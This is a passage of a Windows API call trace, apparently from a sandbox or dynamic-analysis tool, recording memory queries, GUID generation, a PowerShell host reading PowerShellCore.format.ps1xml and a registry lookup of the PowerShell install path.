	[0040.345] VirtualQuery (in: lpAddress=0x25d048, lpBuffer=0x25e048, dwLength=0x1c | out: lpBuffer=0x25e048*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0040.345] VirtualQuery (in: lpAddress=0x25d084, lpBuffer=0x25e084, dwLength=0x1c | out: lpBuffer=0x25e084*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0040.345] VirtualQuery (in: lpAddress=0x25d048, lpBuffer=0x25e048, dwLength=0x1c | out: lpBuffer=0x25e048*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0040.346] VirtualQuery (in: lpAddress=0x25d084, lpBuffer=0x25e084, dwLength=0x1c | out: lpBuffer=0x25e084*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0040.346] VirtualQuery (in: lpAddress=0x25ceec, lpBuffer=0x25deec, dwLength=0x1c | out: lpBuffer=0x25deec*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0040.346] VirtualQuery (in: lpAddress=0x25d048, lpBuffer=0x25e048, dwLength=0x1c | out: lpBuffer=0x25e048*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0040.346] VirtualQuery (in: lpAddress=0x25d084, lpBuffer=0x25e084, dwLength=0x1c | out: lpBuffer=0x25e084*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0040.347] VirtualQuery (in: lpAddress=0x25d048, lpBuffer=0x25e048, dwLength=0x1c | out: lpBuffer=0x25e048*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0040.347] VirtualQuery (in: lpAddress=0x25d084, lpBuffer=0x25e084, dwLength=0x1c | out: lpBuffer=0x25e084*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0040.347] CoCreateGuid (in: pguid=0x25e3f8 | out: pguid=0x25e3f8*(Data1=0xff447cf5, Data2=0x4f62, Data3=0x403f, Data4=([0]=0xb3, [1]=0xb1, [2]=0xb7, [3]=0x82, [4]=0xcf, [5]=0x3b, [6]=0x91, [7]=0x9e))) returned 0x0
	[0040.347] CoCreateGuid (in: pguid=0x25e3f8 | out: pguid=0x25e3f8*(Data1=0x8911ea11, Data2=0x2cb6, Data3=0x47d7, Data4=([0]=0x9e, [1]=0xcc, [2]=0x7c, [3]=0xfc, [4]=0x79, [5]=0x73, [6]=0x29, [7]=0xb4))) returned 0x0
	[0040.348] CoCreateGuid (in: pguid=0x25e3f8 | out: pguid=0x25e3f8*(Data1=0x9eab06a8, Data2=0xaef7, Data3=0x4c3e, Data4=([0]=0xbe, [1]=0xf4, [2]=0x9a, [3]=0x53, [4]=0xe1, [5]=0x11, [6]=0x68, [7]=0x10))) returned 0x0
	[0040.348] CoCreateGuid (in: pguid=0x25e3f8 | out: pguid=0x25e3f8*(Data1=0x686c65b5, Data2=0x8f18, Data3=0x48ba, Data4=([0]=0xb3, [1]=0xcd, [2]=0xd4, [3]=0xf4, [4]=0xb0, [5]=0x8, [6]=0x6, [7]=0x93))) returned 0x0
	[0040.349] CoCreateGuid (in: pguid=0x25e3f8 | out: pguid=0x25e3f8*(Data1=0xe6cd0d5, Data2=0xf05b, Data3=0x4785, Data4=([0]=0xb6, [1]=0x9b, [2]=0x74, [3]=0x2a, [4]=0xa3, [5]=0xbb, [6]=0xa4, [7]=0x93))) returned 0x0
	[0040.349] VirtualQuery (in: lpAddress=0x25cf7c, lpBuffer=0x25df7c, dwLength=0x1c | out: lpBuffer=0x25df7c*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0040.349] VirtualQuery (in: lpAddress=0x25cfb8, lpBuffer=0x25dfb8, dwLength=0x1c | out: lpBuffer=0x25dfb8*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0040.349] CoCreateGuid (in: pguid=0x25e3f8 | out: pguid=0x25e3f8*(Data1=0xb28ee6d, Data2=0xdd0f, Data3=0x4283, Data4=([0]=0x97, [1]=0xc4, [2]=0x8e, [3]=0x3b, [4]=0xef, [5]=0x2, [6]=0xd5, [7]=0xe2))) returned 0x0
	[0040.349] CoCreateGuid (in: pguid=0x25e3f8 | out: pguid=0x25e3f8*(Data1=0xf7884312, Data2=0xf8d7, Data3=0x47f9, Data4=([0]=0x98, [1]=0x93, [2]=0x58, [3]=0x13, [4]=0x1a, [5]=0x74, [6]=0x4e, [7]=0xac))) returned 0x0
	[0040.350] CoCreateGuid (in: pguid=0x25e3f8 | out: pguid=0x25e3f8*(Data1=0x8fbe1579, Data2=0x997a, Data3=0x4065, Data4=([0]=0xac, [1]=0xdb, [2]=0x80, [3]=0x7a, [4]=0x7c, [5]=0x79, [6]=0x60, [7]=0xbc))) returned 0x0
	[0040.350] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x300
	[0040.350] GetLastError () returned 0x0
	[0040.350] GetFileType (hFile=0x300) returned 0x1
	[0040.350] SetErrorMode (uMode=0x1) returned 0x1
	[0040.350] GetFileType (hFile=0x300) returned 0x1
	[0040.351] ReadFile (in: hFile=0x300, lpBuffer=0x288cf94, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e404, lpOverlapped=0x0 | out: lpBuffer=0x288cf94*, lpNumberOfBytesRead=0x25e404*=0x1000, lpOverlapped=0x0) returned 1
	[0040.352] GetLastError () returned 0x0
	[0040.353] ReadFile (in: hFile=0x300, lpBuffer=0x288cf94, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e404, lpOverlapped=0x0 | out: lpBuffer=0x288cf94*, lpNumberOfBytesRead=0x25e404*=0x1000, lpOverlapped=0x0) returned 1
	[0040.353] GetLastError () returned 0x0
	[0040.353] ReadFile (in: hFile=0x300, lpBuffer=0x288cf94, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e404, lpOverlapped=0x0 | out: lpBuffer=0x288cf94*, lpNumberOfBytesRead=0x25e404*=0x1000, lpOverlapped=0x0) returned 1
	[0040.353] GetLastError () returned 0x0
	[0040.354] ReadFile (in: hFile=0x300, lpBuffer=0x288cf94, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e404, lpOverlapped=0x0 | out: lpBuffer=0x288cf94*, lpNumberOfBytesRead=0x25e404*=0x1000, lpOverlapped=0x0) returned 1
	[0040.354] GetLastError () returned 0x0
	[0040.354] ReadFile (in: hFile=0x300, lpBuffer=0x288cf94, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e404, lpOverlapped=0x0 | out: lpBuffer=0x288cf94*, lpNumberOfBytesRead=0x25e404*=0x1000, lpOverlapped=0x0) returned 1
	[0040.354] GetLastError () returned 0x0
	[0040.354] ReadFile (in: hFile=0x300, lpBuffer=0x288cf94, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e404, lpOverlapped=0x0 | out: lpBuffer=0x288cf94*, lpNumberOfBytesRead=0x25e404*=0x1000, lpOverlapped=0x0) returned 1
	[0040.355] GetLastError () returned 0x0
	[0040.355] ReadFile (in: hFile=0x300, lpBuffer=0x288cf94, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e404, lpOverlapped=0x0 | out: lpBuffer=0x288cf94*, lpNumberOfBytesRead=0x25e404*=0x1000, lpOverlapped=0x0) returned 1
	[0040.355] GetLastError () returned 0x0
	[0040.355] ReadFile (in: hFile=0x300, lpBuffer=0x288cf94, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e404, lpOverlapped=0x0 | out: lpBuffer=0x288cf94*, lpNumberOfBytesRead=0x25e404*=0x1000, lpOverlapped=0x0) returned 1
	[0040.355] GetLastError () returned 0x0
	[0040.355] ReadFile (in: hFile=0x300, lpBuffer=0x288cf94, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e404, lpOverlapped=0x0 | out: lpBuffer=0x288cf94*, lpNumberOfBytesRead=0x25e404*=0x1000, lpOverlapped=0x0) returned 1
	[0040.355] GetLastError () returned 0x0
	[0040.356] ReadFile (in: hFile=0x300, lpBuffer=0x288cf94, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e404, lpOverlapped=0x0 | out: lpBuffer=0x288cf94*, lpNumberOfBytesRead=0x25e404*=0x1000, lpOverlapped=0x0) returned 1
	[0040.356] GetLastError () returned 0x0
	[0040.357] ReadFile (in: hFile=0x300, lpBuffer=0x288cf94, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e404, lpOverlapped=0x0 | out: lpBuffer=0x288cf94*, lpNumberOfBytesRead=0x25e404*=0x1000, lpOverlapped=0x0) returned 1
	[0040.357] GetLastError () returned 0x0
	[0040.357] ReadFile (in: hFile=0x300, lpBuffer=0x288cf94, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e404, lpOverlapped=0x0 | out: lpBuffer=0x288cf94*, lpNumberOfBytesRead=0x25e404*=0x1000, lpOverlapped=0x0) returned 1
	[0040.357] GetLastError () returned 0x0
	[0040.357] ReadFile (in: hFile=0x300, lpBuffer=0x288cf94, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e404, lpOverlapped=0x0 | out: lpBuffer=0x288cf94*, lpNumberOfBytesRead=0x25e404*=0x1000, lpOverlapped=0x0) returned 1
	[0040.357] GetLastError () returned 0x0
	[0040.357] ReadFile (in: hFile=0x300, lpBuffer=0x288cf94, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e404, lpOverlapped=0x0 | out: lpBuffer=0x288cf94*, lpNumberOfBytesRead=0x25e404*=0x1000, lpOverlapped=0x0) returned 1
	[0040.358] GetLastError () returned 0x0
	[0040.358] ReadFile (in: hFile=0x300, lpBuffer=0x288cf94, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e404, lpOverlapped=0x0 | out: lpBuffer=0x288cf94*, lpNumberOfBytesRead=0x25e404*=0x1000, lpOverlapped=0x0) returned 1
	[0040.358] GetLastError () returned 0x0
	[0040.358] ReadFile (in: hFile=0x300, lpBuffer=0x288cf94, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e404, lpOverlapped=0x0 | out: lpBuffer=0x288cf94*, lpNumberOfBytesRead=0x25e404*=0x1000, lpOverlapped=0x0) returned 1
	[0040.358] GetLastError () returned 0x0
	[0040.358] ReadFile (in: hFile=0x300, lpBuffer=0x288cf94, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e404, lpOverlapped=0x0 | out: lpBuffer=0x288cf94*, lpNumberOfBytesRead=0x25e404*=0x1000, lpOverlapped=0x0) returned 1
	[0040.358] GetLastError () returned 0x0
	[0040.362] ReadFile (in: hFile=0x300, lpBuffer=0x288cf94, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e404, lpOverlapped=0x0 | out: lpBuffer=0x288cf94*, lpNumberOfBytesRead=0x25e404*=0x1000, lpOverlapped=0x0) returned 1
	[0040.362] GetLastError () returned 0x0
	[0040.362] ReadFile (in: hFile=0x300, lpBuffer=0x288cf94, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e404, lpOverlapped=0x0 | out: lpBuffer=0x288cf94*, lpNumberOfBytesRead=0x25e404*=0x1000, lpOverlapped=0x0) returned 1
	[0040.362] GetLastError () returned 0x0
	[0040.362] ReadFile (in: hFile=0x300, lpBuffer=0x288cf94, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e404, lpOverlapped=0x0 | out: lpBuffer=0x288cf94*, lpNumberOfBytesRead=0x25e404*=0x1000, lpOverlapped=0x0) returned 1
	[0040.362] GetLastError () returned 0x0
	[0040.363] ReadFile (in: hFile=0x300, lpBuffer=0x288cf94, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e404, lpOverlapped=0x0 | out: lpBuffer=0x288cf94*, lpNumberOfBytesRead=0x25e404*=0x1000, lpOverlapped=0x0) returned 1
	[0040.363] GetLastError () returned 0x0
	[0040.363] ReadFile (in: hFile=0x300, lpBuffer=0x288cf94, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e404, lpOverlapped=0x0 | out: lpBuffer=0x288cf94*, lpNumberOfBytesRead=0x25e404*=0xe67, lpOverlapped=0x0) returned 1
	[0040.363] GetLastError () returned 0x0
	[0040.363] ReadFile (in: hFile=0x300, lpBuffer=0x288c59b, nNumberOfBytesToRead=0x199, lpNumberOfBytesRead=0x25e404, lpOverlapped=0x0 | out: lpBuffer=0x288c59b*, lpNumberOfBytesRead=0x25e404*=0x0, lpOverlapped=0x0) returned 1
	[0040.363] GetLastError () returned 0x0
	[0040.363] ReadFile (in: hFile=0x300, lpBuffer=0x288cf94, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e404, lpOverlapped=0x0 | out: lpBuffer=0x288cf94*, lpNumberOfBytesRead=0x25e404*=0x0, lpOverlapped=0x0) returned 1
	[0040.363] GetLastError () returned 0x0
	[0040.363] CloseHandle (hObject=0x300) returned 1
	[0040.363] GetLastError () returned 0x0
	[0040.363] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x28ad824 | out: lpFileInformation=0x28ad824*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a182698, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a182698, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd368cf9c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x15e67)) returned 1
	[0040.364] GetLastError () returned 0x0
	[0040.364] SetErrorMode (uMode=0x1) returned 0x1
	[0040.364] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e388 | out: phkResult=0x25e388*=0x300) returned 0x0
	[0040.364] RegQueryValueExW (in: hKey=0x300, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x25e3d0, lpData=0x0, lpcbData=0x25e3cc*=0x0 | out: lpType=0x25e3d0*=0x1, lpData=0x0, lpcbData=0x25e3cc*=0x56) returned 0x0
	[0040.364] RegQueryValueExW (in: hKey=0x300, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x25e3d0, lpData=0x190b58, lpcbData=0x25e3cc*=0x56 | out: lpType=0x25e3d0*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x25e3cc*=0x56) returned 0x0
	[0040.364] RegCloseKey (hKey=0x300) returned 0x0
	[0040.364] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x25df30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0040.364] GetLastError () returned 0x0
	[0040.364] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x25dec4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0040.364] GetLastError () returned 0x0
	[0040.370] CoCreateGuid (in: pguid=0x25e3f8 | out: pguid=0x25e3f8*(Data1=0xd3551997, Data2=0xf4d9, Data3=0x4aa0, Data4=([0]=0x8f, [1]=0x3b, [2]=0xae, [3]=0xb1, [4]=0x91, [5]=0x26, [6]=0x1e, [7]=0x40))) returned 0x0
	[0040.371] CoCreateGuid (in: pguid=0x25e3f8 | out: pguid=0x25e3f8*(Data1=0xe9ba6d55, Data2=0x4316, Data3=0x4805, Data4=([0]=0x86, [1]=0x52, [2]=0xe1, [3]=0x10, [4]=0x5a, [5]=0x5a, [6]=0x86, [7]=0x14))) returned 0x0
	[0040.371] CoCreateGuid (in: pguid=0x25e3f8 | out: pguid=0x25e3f8*(Data1=0xe7cbd050, Data2=0x2948, Data3=0x493d, Data4=([0]=0xa5, [1]=0xfa, [2]=0xf4, [3]=0x2c, [4]=0x8b, [5]=0x4f, [6]=0x9a, [7]=0x18))) returned 0x0
	[0040.371] CoCreateGuid (in: pguid=0x25e3f8 | out: pguid=0x25e3f8*(Data1=0xc2d6b62e, Data2=0x9b47, Data3=0x43f8, Data4=([0]=0x8d, [1]=0x37, [2]=0x10, [3]=0xaa, [4]=0x7c, [5]=0xa3, [6]=0x8c, [7]=0x92))) returned 0x0
	[0040.372] CoCreateGuid (in: pguid=0x25e3f8 | out: pguid=0x25e3f8*(Data1=0x6c124973, Data2=0xaa3b, Data3=0x4653, Data4=([0]=0xbe, [1]=0x25, [2]=0xd, [3]=0xce, [4]=0x92, [5]=0xe, [6]=0xd0, [7]=0xa7))) returned 0x0
	[0040.372] CoCreateGuid (in: pguid=0x25e3f8 | out: pguid=0x25e3f8*(Data1=0x80634420, Data2=0x397a, Data3=0x4e45, Data4=([0]=0xb3, [1]=0x19, [2]=0xfe, [3]=0x5, [4]=0xce, [5]=0xd6, [6]=0x20, [7]=0x76))) returned 0x0
	[0040.372] CoCreateGuid (in: pguid=0x25e3f8 | out: pguid=0x25e3f8*(Data1=0xce3655ae, Data2=0xba35, Data3=0x4295, Data4=([0]=0xb0, [1]=0x19, [2]=0xa2, [3]=0x3c, [4]=0xc3, [5]=0x4a, [6]=0xa9, [7]=0xcc))) returned 0x0
	[0040.372] VirtualQuery (in: lpAddress=0x25d150, lpBuffer=0x25e150, dwLength=0x1c | out: lpBuffer=0x25e150*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0040.373] CoCreateGuid (in: pguid=0x25e3f8 | out: pguid=0x25e3f8*(Data1=0x66d6e1, Data2=0xacc3, Data3=0x490d, Data4=([0]=0xa6, [1]=0xae, [2]=0x5d, [3]=0xed, [4]=0xe7, [5]=0x8e, [6]=0x15, [7]=0x5b))) returned 0x0
	[0040.373] CoCreateGuid (in: pguid=0x25e3f8 | out: pguid=0x25e3f8*(Data1=0xd67f9d5e, Data2=0xe0f9, Data3=0x4e23, Data4=([0]=0x8c, [1]=0x0, [2]=0x99, [3]=0xe4, [4]=0xa6, [5]=0x35, [6]=0x82, [7]=0xc2))) returned 0x0
	[0040.373] CoCreateGuid (in: pguid=0x25e3f8 | out: pguid=0x25e3f8*(Data1=0xe6ecef47, Data2=0xfae7, Data3=0x4134, Data4=([0]=0x80, [1]=0xd7, [2]=0x31, [3]=0xfb, [4]=0x89, [5]=0xcc, [6]=0xc0, [7]=0x37))) returned 0x0
	[0040.373] CoCreateGuid (in: pguid=0x25e3f8 | out: pguid=0x25e3f8*(Data1=0xc93a8b2f, Data2=0x99db, Data3=0x46f4, Data4=([0]=0xad, [1]=0x6f, [2]=0xd4, [3]=0xfa, [4]=0x6, [5]=0x63, [6]=0x7a, [7]=0xdd))) returned 0x0
	[0040.374] CoCreateGuid (in: pguid=0x25e3f8 | out: pguid=0x25e3f8*(Data1=0x8698543d, Data2=0xcee5, Data3=0x4281, Data4=([0]=0x82, [1]=0x88, [2]=0xed, [3]=0x6e, [4]=0x8b, [5]=0xee, [6]=0x64, [7]=0x5c))) returned 0x0
	[0040.374] CoCreateGuid (in: pguid=0x25e3f8 | out: pguid=0x25e3f8*(Data1=0x1ffcafa4, Data2=0xc438, Data3=0x40e2, Data4=([0]=0xa2, [1]=0xba, [2]=0x6f, [3]=0x53, [4]=0x7d, [5]=0xe5, [6]=0xba, [7]=0x39))) returned 0x0
	[0040.374] CoCreateGuid (in: pguid=0x25e3f8 | out: pguid=0x25e3f8*(Data1=0xa1126078, Data2=0x837f, Data3=0x43c0, Data4=([0]=0xa2, [1]=0xb1, [2]=0xc8, [3]=0xcf, [4]=0x2a, [5]=0x5b, [6]=0x26, [7]=0x50))) returned 0x0
	[0040.374] CoCreateGuid (in: pguid=0x25e3f8 | out: pguid=0x25e3f8*(Data1=0x4358a45b, Data2=0x7201, Data3=0x4bce, Data4=([0]=0xa4, [1]=0x5, [2]=0x6b, [3]=0xc, [4]=0x22, [5]=0x2f, [6]=0x71, [7]=0x50))) returned 0x0
	[0040.374] CoCreateGuid (in: pguid=0x25e3f8 | out: pguid=0x25e3f8*(Data1=0x9ff04e08, Data2=0x7bec, Data3=0x42bb, Data4=([0]=0x8a, [1]=0xf6, [2]=0x68, [3]=0x32, [4]=0x25, [5]=0x85, [6]=0xd3, [7]=0x5f))) returned 0x0
	[0040.375] CoCreateGuid (in: pguid=0x25e3f8 | out: pguid=0x25e3f8*(Data1=0xfa832898, Data2=0x68f, Data3=0x44c3, Data4=([0]=0x95, [1]=0xc7, [2]=0x96, [3]=0x36, [4]=0xea, [5]=0x9a, [6]=0xa, [7]=0x31))) returned 0x0
	[0040.375] CoCreateGuid (in: pguid=0x25e3f8 | out: pguid=0x25e3f8*(Data1=0xed91554b, Data2=0xa95e, Data3=0x46df, Data4=([0]=0x9d, [1]=0x67, [2]=0xaf, [3]=0x5c, [4]=0xe1, [5]=0x99, [6]=0x81, [7]=0xcc))) returned 0x0
	[0040.375] CoCreateGuid (in: pguid=0x25e3f8 | out: pguid=0x25e3f8*(Data1=0x2d34345c, Data2=0xf083, Data3=0x430d, Data4=([0]=0xaf, [1]=0x7, [2]=0x8d, [3]=0x0, [4]=0xd2, [5]=0xf7, [6]=0xc, [7]=0x9a))) returned 0x0
	[0040.375] VirtualQuery (in: lpAddress=0x25d130, lpBuffer=0x25e130, dwLength=0x1c | out: lpBuffer=0x25e130*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0040.376] VirtualQuery (in: lpAddress=0x25d130, lpBuffer=0x25e130, dwLength=0x1c | out: lpBuffer=0x25e130*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0040.376] VirtualQuery (in: lpAddress=0x25d130, lpBuffer=0x25e130, dwLength=0x1c | out: lpBuffer=0x25e130*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0040.377] CoCreateGuid (in: pguid=0x25e3f8 | out: pguid=0x25e3f8*(Data1=0x3ccf1df1, Data2=0xe74, Data3=0x4a97, Data4=([0]=0x9e, [1]=0x59, [2]=0x85, [3]=0xdd, [4]=0x30, [5]=0x9b, [6]=0x6b, [7]=0xa8))) returned 0x0
	[0040.377] CoCreateGuid (in: pguid=0x25e3f8 | out: pguid=0x25e3f8*(Data1=0x1a8744, Data2=0xc168, Data3=0x4ef6, Data4=([0]=0x9b, [1]=0xb5, [2]=0x74, [3]=0x55, [4]=0x58, [5]=0x85, [6]=0x97, [7]=0x6a))) returned 0x0
	[0040.377] CoCreateGuid (in: pguid=0x25e3f8 | out: pguid=0x25e3f8*(Data1=0xacf56b25, Data2=0x5f99, Data3=0x4a44, Data4=([0]=0xa6, [1]=0xed, [2]=0xfa, [3]=0x5e, [4]=0xeb, [5]=0xab, [6]=0x9b, [7]=0x75))) returned 0x0
	[0040.377] CoCreateGuid (in: pguid=0x25e3f8 | out: pguid=0x25e3f8*(Data1=0x64ede906, Data2=0x89e3, Data3=0x42d3, Data4=([0]=0x8c, [1]=0x35, [2]=0x20, [3]=0xa5, [4]=0xd0, [5]=0xba, [6]=0xfd, [7]=0xa0))) returned 0x0
	[0040.377] CoCreateGuid (in: pguid=0x25e3f8 | out: pguid=0x25e3f8*(Data1=0x840f283b, Data2=0xaf32, Data3=0x4f07, Data4=([0]=0xbb, [1]=0xbe, [2]=0xe3, [3]=0x99, [4]=0xd4, [5]=0x43, [6]=0x5b, [7]=0x96))) returned 0x0
	[0040.378] CoCreateGuid (in: pguid=0x25e3f8 | out: pguid=0x25e3f8*(Data1=0xea68139, Data2=0x244b, Data3=0x4fc7, Data4=([0]=0x87, [1]=0xa4, [2]=0xcf, [3]=0xf1, [4]=0xe4, [5]=0x1c, [6]=0xc1, [7]=0x61))) returned 0x0
	[0040.378] CoCreateGuid (in: pguid=0x25e3f8 | out: pguid=0x25e3f8*(Data1=0x2fcfbaad, Data2=0xe978, Data3=0x4630, Data4=([0]=0xa6, [1]=0xf, [2]=0x75, [3]=0xc1, [4]=0xe9, [5]=0xb5, [6]=0x1e, [7]=0xb9))) returned 0x0
	[0040.378] CoCreateGuid (in: pguid=0x25e3f8 | out: pguid=0x25e3f8*(Data1=0xfe4954c, Data2=0xec39, Data3=0x46a5, Data4=([0]=0xa1, [1]=0xd, [2]=0x27, [3]=0xc4, [4]=0xf, [5]=0xee, [6]=0x8e, [7]=0x92))) returned 0x0
	[0040.378] CoCreateGuid (in: pguid=0x25e3f8 | out: pguid=0x25e3f8*(Data1=0xd329d40f, Data2=0xf4ae, Data3=0x4905, Data4=([0]=0x82, [1]=0x35, [2]=0xc6, [3]=0xf1, [4]=0xe, [5]=0x81, [6]=0x42, [7]=0x51))) returned 0x0
	[0040.378] CoCreateGuid (in: pguid=0x25e3f8 | out: pguid=0x25e3f8*(Data1=0x42a764c6, Data2=0xbadf, Data3=0x4a7f, Data4=([0]=0xa5, [1]=0x2f, [2]=0x27, [3]=0x5, [4]=0x8b, [5]=0x80, [6]=0xee, [7]=0x16))) returned 0x0
	[0040.379] CoCreateGuid (in: pguid=0x25e3f8 | out: pguid=0x25e3f8*(Data1=0xa28ae31b, Data2=0xd179, Data3=0x4cd9, Data4=([0]=0xb6, [1]=0x96, [2]=0x55, [3]=0x89, [4]=0x96, [5]=0x3d, [6]=0xb3, [7]=0xf1))) returned 0x0
	[0040.379] CoCreateGuid (in: pguid=0x25e3f8 | out: pguid=0x25e3f8*(Data1=0x3942d728, Data2=0x7262, Data3=0x435f, Data4=([0]=0x83, [1]=0x8c, [2]=0x7c, [3]=0x4a, [4]=0x71, [5]=0x46, [6]=0x1b, [7]=0x20))) returned 0x0
	[0040.379] CoCreateGuid (in: pguid=0x25e3f8 | out: pguid=0x25e3f8*(Data1=0x4e31728, Data2=0x50b5, Data3=0x476c, Data4=([0]=0xb0, [1]=0xf0, [2]=0xca, [3]=0xec, [4]=0x2, [5]=0x50, [6]=0x81, [7]=0x79))) returned 0x0
	[0040.379] VirtualQuery (in: lpAddress=0x25d150, lpBuffer=0x25e150, dwLength=0x1c | out: lpBuffer=0x25e150*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0040.379] CoCreateGuid (in: pguid=0x25e3f8 | out: pguid=0x25e3f8*(Data1=0xf23df6f0, Data2=0x567, Data3=0x4ba3, Data4=([0]=0xa3, [1]=0xcd, [2]=0x68, [3]=0x6d, [4]=0x5b, [5]=0xbd, [6]=0x77, [7]=0xde))) returned 0x0
	[0040.379] VirtualQuery (in: lpAddress=0x25d150, lpBuffer=0x25e150, dwLength=0x1c | out: lpBuffer=0x25e150*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0040.383] VirtualQuery (in: lpAddress=0x25d150, lpBuffer=0x25e150, dwLength=0x1c | out: lpBuffer=0x25e150*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0040.388] CoCreateGuid (in: pguid=0x25e3f8 | out: pguid=0x25e3f8*(Data1=0x57a2a852, Data2=0xdedb, Data3=0x4683, Data4=([0]=0xad, [1]=0xbb, [2]=0x84, [3]=0xb9, [4]=0x21, [5]=0x12, [6]=0x85, [7]=0x15))) returned 0x0
